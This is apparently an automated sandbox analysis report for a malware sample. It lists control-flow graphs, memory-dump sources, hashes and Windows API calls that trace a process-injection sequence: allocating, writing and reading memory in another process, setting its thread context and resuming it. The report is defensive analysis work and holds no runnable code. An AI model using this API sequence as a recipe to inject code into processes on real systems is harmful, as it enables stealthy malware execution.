                                                                  • API ID: MemoryProcessWrite
                                                                  • API String ID: 3559483778-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966c1f0 (last block 966c2bc); the basic block 966c253-966c283 calls Wow64SetThreadContext
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0966C276
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • API String ID: 983334009-0

                                                                  Control-flow Graph

                                                                  • Control-flow graph of the function at 966c8b0 (last block 966c97e); the entry block 966c8b0-966c945 calls ReadProcessMemory
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0966C938
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • API String ID: 1726664587-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 966c8b8-966c945 (ReadProcessMemory) -> 966c947-966c94d and -> 966c94e-966c97e; 966c947-966c94d -> 966c94e-966c97e
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0966C938
Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 966c1f8-966c243 -> 966c245-966c251 and -> 966c253-966c283 (Wow64SetThreadContext); 966c245-966c251 -> 966c253-966c283; 966c253-966c283 -> 966c285-966c28b and -> 966c28c-966c2bc; 966c285-966c28b -> 966c28c-966c2bc
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0966C276
Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 7c8836c-7c8950c (CreateIconFromResourceEx) -> 7c8950e-7c89514 and -> 7c89515-7c89532; 7c8950e-7c89514 -> 7c89515-7c89532
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07C8945A,?,?,?,?,?), ref: 07C894FF
Memory Dump Source
• Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 966c701-966c783 (VirtualAllocEx) -> 966c785-966c78b and -> 966c78c-966c7b1; 966c785-966c78b -> 966c78c-966c7b1
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0966C776
Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 966c708-966c783 (VirtualAllocEx) -> 966c785-966c78b and -> 966c78c-966c7b1; 966c785-966c78b -> 966c78c-966c7b1
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0966C776
Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

Control-flow Graph
• Graph image not captured (Executed / Not Executed colouring lost); recoverable blocks and edges: 966c140-966c1b7 (ResumeThread) -> 966c1c0-966c1e5 and -> 966c1b9-966c1bf; 966c1b9-966c1bf -> 966c1c0-966c1e5
Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0

APIs
• KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0094F0DD
Memory Dump Source
• Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0

Memory Dump Source
• Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0

APIs
• PostMessageW.USER32(?,?,?,?), ref: 094413DD
Memory Dump Source
• Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0

APIs
• PostMessageW.USER32(?,?,?,?), ref: 094413DD
Memory Dump Source
• Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0

Memory Dump Source
• Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Strings
Memory Dump Source
• Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID: \~e
• API String ID: 0-969365249

Strings
Memory Dump Source
• Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
Similarity
• API ID:
• String ID: 9\;'
• API String ID: 0-1350165936
                                                                  • Opcode ID: 7623bf7141ab025da12d5f0570b42f64d5c4c6f75e2aa69a2b4ddd1f7ce2c586
                                                                  • Instruction ID: 2aa2fa6b78de937f7c77da0ac815803950f851e955d86cba7683bb99a15eaf68
                                                                  • Opcode Fuzzy Hash: 7623bf7141ab025da12d5f0570b42f64d5c4c6f75e2aa69a2b4ddd1f7ce2c586
                                                                  • Instruction Fuzzy Hash: B341E3B4E0560A9FCB08CFA9C580AAEFBF2FF88300F25C56AC405A7255D7349A41CF94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9\;'
                                                                  • API String ID: 0-1350165936
                                                                  • Opcode ID: 0f41d63d84329839c761b0fc9c35f2772a363b3391dcecff9a72c8e304cb36fd
                                                                  • Instruction ID: 171e2941f171cd0687ab4fd5b52990b1fdabeaf3d0c1d200973d963c3195b23c
                                                                  • Opcode Fuzzy Hash: 0f41d63d84329839c761b0fc9c35f2772a363b3391dcecff9a72c8e304cb36fd
                                                                  • Instruction Fuzzy Hash: DF41D2B4E0560ADFCB08CFA9C580AAEFBF2FB88300F25D56AC415A7215D7349A41CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dacb4e871a0edf82b770e03745b86a205463b33617d0aebe65382de30f3cfcd1
                                                                  • Instruction ID: 8e4a99ab9adf197549f798712a5732596db7595bf9027d2df413b84480fa96cd
                                                                  • Opcode Fuzzy Hash: dacb4e871a0edf82b770e03745b86a205463b33617d0aebe65382de30f3cfcd1
                                                                  • Instruction Fuzzy Hash: 2BE10E74E001298FDB14DFA9C580AAEFBB2FF89305F248269D855A7355D7319D42CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebb219b9189cca23f72177a3cc0d24309bb1d2e54cfdd1fca5bda5de6315093b
                                                                  • Instruction ID: 39d47ce2f35ed32b9490139cfea59313156722dd66f9a6d9f8f54445b85c9d54
                                                                  • Opcode Fuzzy Hash: ebb219b9189cca23f72177a3cc0d24309bb1d2e54cfdd1fca5bda5de6315093b
                                                                  • Instruction Fuzzy Hash: CCE1DA74E04129CFDB14DFA9C580AAEBBB2FF89305F248269D455A7355D730AD42CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d38c421687fb4074432fca69a6b9ad5126b0dfcbf2484166838961307712085
                                                                  • Instruction ID: cd80eddad8198ef7bcd3ebf82d3d055d0f5c9c563ff0bca2b22dabe0980f77e1
                                                                  • Opcode Fuzzy Hash: 2d38c421687fb4074432fca69a6b9ad5126b0dfcbf2484166838961307712085
                                                                  • Instruction Fuzzy Hash: 07E1E974E002698FDB14DF99C580AAEFBB2FF89305F248259D855AB355D730AD42CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97ae86606d3afecc91523ecf8bf66a6f2d5b5ac94367453faa8262ee78b21792
                                                                  • Instruction ID: bc85c001ecead01a55a7e94c57f6d0c7f97375c76d2ce886035fde49b75a192d
                                                                  • Opcode Fuzzy Hash: 97ae86606d3afecc91523ecf8bf66a6f2d5b5ac94367453faa8262ee78b21792
                                                                  • Instruction Fuzzy Hash: 0DE12CB4E002298FDB14DF99C584AAEFBB2FF89305F248269D455A7315C731AD42CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10c8e52de908e2ae0c3882e78fc207cb85bb1e70693d9a15855b90927b57aa77
                                                                  • Instruction ID: e5335eef6b49c1edcd953b23e10be0ee8af9253853232dfdbe8e81bed609bec7
                                                                  • Opcode Fuzzy Hash: 10c8e52de908e2ae0c3882e78fc207cb85bb1e70693d9a15855b90927b57aa77
                                                                  • Instruction Fuzzy Hash: 93E11DB4E006298FDB14DF99C580AAEFBB2FF89305F248269D555A7315C734AD42CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24b492fd940eae73a96d0cd06d8a9be7d7fed34778bf0e239192c6176d60fadf
                                                                  • Instruction ID: f9a32db4e8ee5b862b72580ee6f10f6b8f955b8ef9fc0ba9e15c6324318a2b66
                                                                  • Opcode Fuzzy Hash: 24b492fd940eae73a96d0cd06d8a9be7d7fed34778bf0e239192c6176d60fadf
                                                                  • Instruction Fuzzy Hash: A0A1BCB4E152198FDB54CFA5C980A9EFBF2FF89304F2481AAD408A7325D7309A41CB61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c40379e24b77cc8328b005a79d6a08f9f0852f331f7d23a211f6768c8de2cf1
                                                                  • Instruction ID: ca06a43be111005529878fb9694506ef38c40e2b6d43f3cb5141e0757022d0d8
                                                                  • Opcode Fuzzy Hash: 6c40379e24b77cc8328b005a79d6a08f9f0852f331f7d23a211f6768c8de2cf1
                                                                  • Instruction Fuzzy Hash: FAA17BB4E11229DFCB54DFA5C984A9EFBB2FF89304F24816AD409A7315D7309A41CF61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43033ab2543d416e82989591952a369669302206b7454927029061f97cbc9a43
                                                                  • Instruction ID: 35535efe92ab893dc36a035c02459ac6cf151643b5c160157df49dbafe793201
                                                                  • Opcode Fuzzy Hash: 43033ab2543d416e82989591952a369669302206b7454927029061f97cbc9a43
                                                                  • Instruction Fuzzy Hash: 9D71F574E0520ADFCB04CF99D580AAEFBB2FF89310F64952AE515AB314D3349A42CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 442e90d154c000b2004d11e661cd111e72d37025145cf48282dbe8bf7517b2cc
                                                                  • Instruction ID: d3dd2d273695f187d1fe60ded6f9670f40a03f9300dcbe57bd372c5bb6f17864
                                                                  • Opcode Fuzzy Hash: 442e90d154c000b2004d11e661cd111e72d37025145cf48282dbe8bf7517b2cc
                                                                  • Instruction Fuzzy Hash: E981AAB4E1522ADFCB54DFA5C580AAEFBB2FF89304F248169D409A7355D7309A41CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59f2bdd809d1099239538ee46ed6fe3432d452018700a84230993ae608696f06
                                                                  • Instruction ID: b7870c74f644fc583a08fb6b35dcfe7e9476f7b9e082d931c2789fb0146ea221
                                                                  • Opcode Fuzzy Hash: 59f2bdd809d1099239538ee46ed6fe3432d452018700a84230993ae608696f06
                                                                  • Instruction Fuzzy Hash: C6719BB4E1522ADFCB54DFA5C584A9EFBB2FF89304F248169D805A7315D7309A41CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ccddddca407b6309a486254cc873a8a7f4f2ecab229bb5e13e3d1f9314be732a
                                                                  • Instruction ID: c4e3625bfc13c3591e490861cc605fbb1d50e49d2d2b08b3c4f0895489c59b3b
                                                                  • Opcode Fuzzy Hash: ccddddca407b6309a486254cc873a8a7f4f2ecab229bb5e13e3d1f9314be732a
                                                                  • Instruction Fuzzy Hash: 9D718AB4E1522ADFCB54DFA5C584AAEFBB2FF89304F248269D409A7315D7309A41CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57ce96f8191fffbda46feed9420be612aa82c97c5e5faa0a8dc3a7321b2ad9c7
                                                                  • Instruction ID: 367a41c31db7429e177d5982368ac0922d9b699a7dcd5c3336aa0931fd3f1d22
                                                                  • Opcode Fuzzy Hash: 57ce96f8191fffbda46feed9420be612aa82c97c5e5faa0a8dc3a7321b2ad9c7
                                                                  • Instruction Fuzzy Hash: B061D474E15609DFCB08CF99C5809DEFBF2EF89310F25942AD815BB325E73499428B64
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84ba71cbb7bb3da92b5fe5d55fc626d28d663b735d331bd2edc23bd5965ad7c9
                                                                  • Instruction ID: cdca51761a8bad2f12e3fc9162ded941801d456b93d686d1b92a1e17fe4ff873
                                                                  • Opcode Fuzzy Hash: 84ba71cbb7bb3da92b5fe5d55fc626d28d663b735d331bd2edc23bd5965ad7c9
                                                                  • Instruction Fuzzy Hash: 74612574E15609CFCB08CFA9C5808DEFBF2EF89310F25942AD415BB325E6349A428B64
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30813c140ce115dd85fecdaec180e3210316accc0cc73425d2122bbc617579f7
                                                                  • Instruction ID: 1d5fdc978b3b1d44708896cbf5ab1f983138e9a4f6f0d52f6a099afa0724274a
                                                                  • Opcode Fuzzy Hash: 30813c140ce115dd85fecdaec180e3210316accc0cc73425d2122bbc617579f7
                                                                  • Instruction Fuzzy Hash: B1612970E0460A9FCF04CFE9C481AEEFBB1BF85300F15855AD465AB255D3789A86CF94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 655f5851d65bb2be08e7c230fc5cc2ce534a3ad4f55c8347ccf77310c3e5fef5
                                                                  • Instruction ID: 8cb3c6cc0028cba2222cdc313ce57c539af5f3d5383acd00c3ed83edc46daea4
                                                                  • Opcode Fuzzy Hash: 655f5851d65bb2be08e7c230fc5cc2ce534a3ad4f55c8347ccf77310c3e5fef5
                                                                  • Instruction Fuzzy Hash: A6513DB5E006298FDB14CFA9C5815AEFBF2FF89300F248169D558A7315D7349942CFA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c8ac3da8f8b9325452b32b130f172aa02ad8e8545170053fb19a0539b43149e
                                                                  • Instruction ID: 9f2271c74d7aafd299efe3207569d88089105acdc901674455969dc21f545b61
                                                                  • Opcode Fuzzy Hash: 1c8ac3da8f8b9325452b32b130f172aa02ad8e8545170053fb19a0539b43149e
                                                                  • Instruction Fuzzy Hash: 3D41E970E0460A9FDB04CFAAC4815AEFBF2BF88310F65C46AC415A7255D7359A418F94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6f4f6453f6cd2ee9245a8086f8ad3e5d05e0efa8e5609e91dd0d3dea5d289d
                                                                  • Instruction ID: 39f3331137fe9256b0d99f368a7ae689a93e1dea98df41d22b9d72ee0bc72363
                                                                  • Opcode Fuzzy Hash: bf6f4f6453f6cd2ee9245a8086f8ad3e5d05e0efa8e5609e91dd0d3dea5d289d
                                                                  • Instruction Fuzzy Hash: F241E3B0E0461ADBDB04CFEAC5809AEFBF2FF88300F65D46AC415A7255E7349A418F94
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb30be64077849573c4314217a8d6477aba4a29a57e31480cc657f496b7fa4a3
                                                                  • Instruction ID: badf733d999f7d88b6994b57ac08a2c2591773208bc7fcf89767048ec480a97c
                                                                  • Opcode Fuzzy Hash: fb30be64077849573c4314217a8d6477aba4a29a57e31480cc657f496b7fa4a3
                                                                  • Instruction Fuzzy Hash: 2031F771E156188FEB18CF6AD840B9EFBF7BFC9300F14C4AAC558AA224D7344A858F51

                                                                  Execution Graph

                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                                  Signature Coverage:4.9%
                                                                  Total number of Nodes:143
                                                                  Total number of Limit Nodes:9

                                                                  Control-flow Graph

                                                                  control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                                  • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795

                                                                  Control-flow Graph

                                                                  control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction ID: 655702566d971be8828d1eb074539a96951f6316c6bda2febc2cf9207e520fe9
                                                                  • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
